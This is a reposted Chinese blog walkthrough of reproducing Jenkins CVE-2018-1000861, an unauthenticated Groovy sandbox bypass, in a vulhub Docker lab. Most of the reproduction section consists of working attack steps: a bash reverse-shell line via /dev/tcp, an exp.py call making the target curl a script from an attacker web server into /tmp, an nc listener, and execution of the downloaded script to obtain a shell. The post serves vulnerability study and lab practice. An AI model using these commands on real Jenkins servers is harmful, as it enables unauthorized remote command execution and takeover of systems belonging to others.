1. 漏洞描述
Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。
通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。
2.环境搭建
直接使用vulhub上的环境
(1) 下载vulhub项目,然后进入到 vulhub/jenkins/CVE-2018-1000861目录下
(2) 执行命令:docker-compose up -d
(3)访问:http://192.168.222.143:8080/
3.漏洞复现
此漏洞没有回显,直接利用orange的exp执行命令反弹shell
orang的exp
https://github.com/orangetw/awesome-jenkins-rce-2019
(1).在我们的web服务器写txt文本内容为:
bash -i >& /dev/tcp/*.*.*.*/2333 0>&1 //bash的反弹
(2).使用GitHub下载的exp.py执行以下命令下载文件。 需要本机搭建的web服务,用于执行curl下载bash反弹命令。
python exp.py http://192.168.222.143:8080/ "curl -o /tmp/1.sh http://192.168.0.103:85/1.txt"
(3).然后在我们接收shell的机器上监听之前写的端口
nc -lvvp 2333
(4).直接bash执行我们下载的脚本
python exp.py http://192.168.222.143:8080/ "bash /tmp/1.sh"
(5).回到监听端口的机器
可以看到已经成功获取到了shell
您可能感兴趣的文章
本文地址:http://www.ouyangxiaoze.com/2020/09/667.html
温馨提示:文章内容系作者个人观点,不代表欧阳小泽的博客对观点赞同或支持。
版权声明:本文为转载文章,来源于 killer ,版权归原作者所有,欢迎分享本文,转载请保留出处!
温馨提示:文章内容系作者个人观点,不代表欧阳小泽的博客对观点赞同或支持。
版权声明:本文为转载文章,来源于 killer ,版权归原作者所有,欢迎分享本文,转载请保留出处!
发表于 2020-09-25 10:49 沙发
文章写的不错,加油~